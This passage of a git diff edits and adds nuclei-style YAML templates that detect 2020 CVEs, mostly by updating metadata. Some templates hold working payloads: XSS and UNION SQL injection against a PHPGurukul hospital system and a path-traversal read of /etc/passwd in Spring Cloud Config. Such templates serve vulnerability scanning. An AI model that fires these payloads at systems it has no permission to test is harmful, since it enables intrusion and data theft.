     cwe-id: CWE-200
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2020,jira,atlassian,unauth
 
 requests:
diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml
index 7780f22248..1d16630c70 100644
--- a/cves/2020/CVE-2020-36365.yaml
+++ b/cves/2020/CVE-2020-36365.yaml
@@ -22,10 +22,10 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
+      - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2020/CVE-2020-36510.yaml b/cves/2020/CVE-2020-36510.yaml
index 4d82785b67..9774ac692c 100644
--- a/cves/2020/CVE-2020-36510.yaml
+++ b/cves/2020/CVE-2020-36510.yaml
@@ -1,14 +1,14 @@
 id: CVE-2020-36510
 
 info:
-  name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting
+  name: WordPress 15Zine <3.3.0 - Cross-Site Scripting
   author: veshraj
   severity: medium
   description: |
-    The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting.
+    WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.
   reference:
     - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-36510
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.10
@@ -16,7 +16,7 @@ info:
     cwe-id: CWE-79
   metadata:
     verified: false
-  tags: xss,wordpress,wp-theme,wp,cve,cve2020
+  tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan
 
 requests:
   - method: GET
@@ -38,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml
index df4a5d8360..0d5edf18aa 100644
--- a/cves/2020/CVE-2020-4463.yaml
+++ b/cves/2020/CVE-2020-4463.yaml
@@ -1,22 +1,27 @@
 id: CVE-2020-4463
 
 info:
-  name: IBM Maximo Asset Management Information Disclosure via XXE
+  name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection
   author: dwisiswant0
   severity: high
   description: |
     IBM Maximo Asset Management is vulnerable to an
-    XML External Entity Injection (XXE) attack when processing XML data.
+    XML external entity injection (XXE) attack when processing XML data.
     A remote attacker could exploit this vulnerability to expose
     sensitive information or consume memory resources.
   reference:
     - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
     - https://github.com/Ibonok/CVE-2020-4463
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
+    - https://www.ibm.com/support/pages/node/6253953
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-4463
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
     cvss-score: 8.2
     cve-id: CVE-2020-4463
     cwe-id: CWE-611
+  metadata:
+    shodan-query: http.favicon.hash:-399298961
   tags: cve,cve2020,ibm,xxe,disclosure
 
 requests:
@@ -31,14 +36,19 @@ requests:
       </max:QueryMXPERSON>
     headers:
       Content-Type: application/xml
+
     matchers-condition: and
     matchers:
+
       - type: word
-        words:
-          - "application/xml"
-        part: header
-      - type: word
+        part: body
         words:
           - "QueryMXPERSONResponse"
           - "MXPERSONSet"
-        part: body
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-5191.yaml b/cves/2020/CVE-2020-5191.yaml
new file mode 100644
index 0000000000..3504447e65
--- /dev/null
+++ b/cves/2020/CVE-2020-5191.yaml
@@ -0,0 +1,57 @@
+id: CVE-2020-5191
+
+info:
+  name: PHPGurukul Hospital Management System - Cross-Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+  reference:
+    - https://www.exploit-db.com/exploits/47841
+    - https://phpgurukul.com/hospital-management-system-in-php/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-5191
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve2020,hms,cms,xss,authenticated,edb,cve
+
+requests:
+  - raw:
+      - |
+        POST /hospital/hms/admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}&submit=&submit=
+
+      - |
+        POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-5192.yaml b/cves/2020/CVE-2020-5192.yaml
new file mode 100644
index 0000000000..73c8e6ec4a
--- /dev/null
+++ b/cves/2020/CVE-2020-5192.yaml
@@ -0,0 +1,53 @@
+id: CVE-2020-5192
+
+info:
+  name: Hospital Management System 4.0 - SQL Injection
+  author: TenBird
+  severity: high
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
+  reference:
+    - https://www.exploit-db.com/exploits/47840
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5192
+    - https://phpgurukul.com/hospital-management-system-in-php/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-5192
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve2020,hms,cms,sqli,authenticated,edb,cve
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /hospital/hms/doctor/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}password={{password}}&submit=&submit=
+
+      - |
+        POST /hospital/hms/doctor/search.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml
index 33b764cf74..1315a10ebb 100644
--- a/cves/2020/CVE-2020-5284.yaml
+++ b/cves/2020/CVE-2020-5284.yaml
@@ -1,13 +1,15 @@
 id: CVE-2020-5284
 
 info:
-  name: Next.js .next/ limited path traversal
+  name: Next.js <9.3.2 - Local File Inclusion
   author: rootxharsh,iamnoooob,dwisiswant0
   severity: medium
-  description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the
-    dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
+  description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.
+  remediation: This issue is fixed in version 9.3.2.
   reference:
-    - https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
+    - https://github.com/zeit/next.js/releases/tag/v9.3.2
+    - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5284
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
@@ -32,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml
index 9b642a1bbc..91c5eaaffc 100644
--- a/cves/2020/CVE-2020-5307.yaml
+++ b/cves/2020/CVE-2020-5307.yaml
@@ -4,16 +4,18 @@ info:
   name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection
   author: gy741
   severity: critical
-  description: "PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php."
+  description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
   reference:
     - https://cinzinga.com/CVE-2020-5307-5308/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-5307
+    - https://www.exploit-db.com/exploits/47846
+    - https://cinzinga.github.io/CVE-2020-5307-5308/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-5307
     cwe-id: CWE-89
-  tags: cve,cve2020,sqli
+  tags: sqli,edb,cve,cve2020
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml
index 73a539a58a..bdd52136f0 100644
--- a/cves/2020/CVE-2020-5405.yaml
+++ b/cves/2020/CVE-2020-5405.yaml
@@ -1,13 +1,13 @@
 id: CVE-2020-5405
 
 info:
-  name: Spring Cloud Directory Traversal
+  name: Spring Cloud Config - Local File Inclusion
   author: harshbothra_
   severity: medium
-  description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server
-    module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
+  description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
   reference:
     - https://pivotal.io/security/cve-2020-5405
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5405
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
     cvss-score: 6.5
@@ -28,3 +28,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml
index 961138c552..8c2b24b7b5 100644
--- a/cves/2020/CVE-2020-5410.yaml
+++ b/cves/2020/CVE-2020-5410.yaml
@@ -1,30 +1,35 @@
 id: CVE-2020-5410
 
 info:
-  name: Directory Traversal in Spring Cloud Config Server
+  name: Spring Cloud Config Server - Local File Inclusion
   author: mavericknerd
   severity: high
-  description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server
-    module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
+  description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.
   reference:
     - https://tanzu.vmware.com/security/cve-2020-5410
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5410
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-5410
     cwe-id: CWE-22
-  tags: cve,cve2020,lfi,springcloud,config,traversal
+  tags: cve,cve2020,lfi,springcloud,config,traversal,kev
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
+
     matchers-condition: and
     matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
       - type: status
         status:
           - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-5775.yaml b/cves/2020/CVE-2020-5775.yaml
index 1df2face75..66b3cb1d14 100644
--- a/cves/2020/CVE-2020-5775.yaml
+++ b/cves/2020/CVE-2020-5775.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 5.8
     cve-id: CVE-2020-5775
     cwe-id: CWE-918
-  tags: cve,cve2020,ssrf,oast,blind
+  tags: cve,cve2020,ssrf,oast,blind,tenable
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml
index e6ea2bc21c..4f8d470800 100644
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@@ -1,18 +1,21 @@
 id: CVE-2020-5776
 
 info:
-  name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin
+  name: MAGMI - Cross-Site Request Forgery
   author: dwisiswant0
   severity: high
-  description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
+  description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.
   reference:
     - https://www.tenable.com/security/research/tra-2020-51
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5776
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-5776
     cwe-id: CWE-352
-  tags: cve,cve2020,magmi,magento
+  metadata:
+    shodan-query: http.component:"Magento"
+  tags: magmi,magento,tenable,cve,cve2020
 
 requests:
   - raw:
@@ -43,4 +46,6 @@ requests:
         condition: and
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml
index e966965962..6b4c111d5a 100644
--- a/cves/2020/CVE-2020-5777.yaml
+++ b/cves/2020/CVE-2020-5777.yaml
@@ -4,16 +4,19 @@ info:
   name: Magento Mass Importer  <0.7.24 - Remote Auth Bypass
   author: dwisiswant0
   severity: critical
-  description: "Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure."
+  description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
   reference:
     - https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
     - https://nvd.nist.gov/vuln/detail/CVE-2020-5777
+    - https://www.tenable.com/security/research/tra-2020-51
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-5777
     cwe-id: CWE-287
-  tags: cve,cve2020,magmi,magento,auth,bypass,plugin
+  metadata:
+    shodan-query: http.component:"Magento"
+  tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml
index 2862d041e4..ad87e9a4ab 100644
--- a/cves/2020/CVE-2020-5847.yaml
+++ b/cves/2020/CVE-2020-5847.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847
+    - https://sysdream.com/news/lab/
+    - https://forums.unraid.net/forum/7-announcements/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-5847
     cwe-id: CWE-94,CWE-668
-  tags: cve,cve2020,rce
+  tags: cve,cve2020,rce,kev
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml
index 20b883a035..6b48ac6d5d 100644
--- a/cves/2020/CVE-2020-5902.yaml
+++ b/cves/2020/CVE-2020-5902.yaml
@@ -23,7 +23,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-5902
     cwe-id: CWE-22,CWE-829
-  tags: cve,cve2020,bigip,rce
+  tags: cve2020,bigip,rce,kev,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml
index 848ea9bb73..084849cab7 100644
--- a/cves/2020/CVE-2020-6171.yaml
+++ b/cves/2020/CVE-2020-6171.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-6171
 
 info:
-  name: CLink Office v2 XSS
+  name: CLink Office 2.0 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
+    CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
   reference:
+    - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-6171
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +36,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml
index feca73c988..e2b8002165 100644
--- a/cves/2020/CVE-2020-6207.yaml
+++ b/cves/2020/CVE-2020-6207.yaml
@@ -4,7 +4,7 @@ info:
   name: SAP Solution Manager 7.2 - Remote Command Execution
   author: _generic_human_
   severity: critical
-  description: "SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent."
+  description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.
   reference:
     - https://launchpad.support.sap.com/#/notes/2890213
     - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305
@@ -18,7 +18,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-6207
     cwe-id: CWE-306
-  tags: cve,cve2020,sap,solman,rce
+  tags: cve,cve2020,sap,solman,rce,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index 46a8368767..6df8034fa4 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -4,7 +4,7 @@ info:
   name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition
   author: dwisiswant0
   severity: critical
-  description: "SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system."
+  description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.
   reference:
     - https://launchpad.support.sap.com/#/notes/2934135
     - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
@@ -13,10 +13,12 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-6287
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2020-6287
     cwe-id: CWE-306
-  tags: cve,cve2020,sap
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
+  tags: cve,cve2020,sap,kev,cisa
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml
index 915febe9dc..492514c99f 100644
--- a/cves/2020/CVE-2020-6308.yaml
+++ b/cves/2020/CVE-2020-6308.yaml
@@ -4,11 +4,11 @@ info:
   name: Unauthenticated Blind SSRF in SAP
   author: madrobot
   severity: medium
-  description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the
-    internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like
-    remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
+  description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
   reference:
     - https://github.com/InitRoot/CVE-2020-6308-PoC
+    - https://launchpad.support.sap.com/#/notes/2943844
+    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml
index 11d2cfc096..925bd35355 100644
--- a/cves/2020/CVE-2020-6637.yaml
+++ b/cves/2020/CVE-2020-6637.yaml
@@ -4,15 +4,19 @@ info:
   name: OpenSIS 7.3 - SQL Injection
   author: pikpikcu
   severity: critical
-  description: "OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php."
+  description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
   reference:
     - https://cinzinga.com/CVE-2020-6637/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-6637
+    - https://sourceforge.net/projects/opensis-ce/files/
+    - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-6637
     cwe-id: CWE-89
+  metadata:
+    shodan-query: http.title:"openSIS"
   tags: cve,cve2020,sqli,opensis
 
 requests:
diff --git a/cves/2020/CVE-2020-7136.yaml b/cves/2020/CVE-2020-7136.yaml
index c07d191ea8..32b67306ba 100644
--- a/cves/2020/CVE-2020-7136.yaml
+++ b/cves/2020/CVE-2020-7136.yaml
@@ -5,17 +5,18 @@ info:
   author: gy741
   severity: critical
   description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
-  remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
   reference:
     - https://www.tenable.com/security/research/tra-2020-02
     - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7136
+    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
+  remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
   classification:
-    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-7136
     cwe-id: CWE-288
-  tags: cve,cve2020,hp,auth-bypass,hpe
+  tags: cve,cve2020,hp,auth-bypass,hpe,tenable
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml
index 71e5eca072..080e2366ec 100644
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
@@ -17,7 +17,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-7209
-  tags: cve,cve2020,rce
+  tags: cve,cve2020,rce,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml
index ec84b0ef0d..2f77f23203 100644
--- a/cves/2020/CVE-2020-7247.yaml
+++ b/cves/2020/CVE-2020-7247.yaml
@@ -9,12 +9,14 @@ info:
   reference:
     - https://www.openwall.com/lists/oss-security/2020/01/28/3
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
+    - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
+    - http://www.openwall.com/lists/oss-security/2020/01/28/3
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-7247
     cwe-id: CWE-78,CWE-755
-  tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
+  tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev
 
 network:
   - inputs:
diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml
index d6509e4ee3..bd832819f1 100644
--- a/cves/2020/CVE-2020-7318.yaml
+++ b/cves/2020/CVE-2020-7318.yaml
@@ -1,17 +1,17 @@
 id: CVE-2020-7318
 
 info:
-  name: McAfee ePolicy Orchestrator Reflected XSS
+  name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
-    prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
-    script or HTML via multiple parameters where the administrator's entries
-    were not correctly sanitized.
-
+    McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
     reference:
     - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
+    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7318
+  reference:
+    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
   classification:
     cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
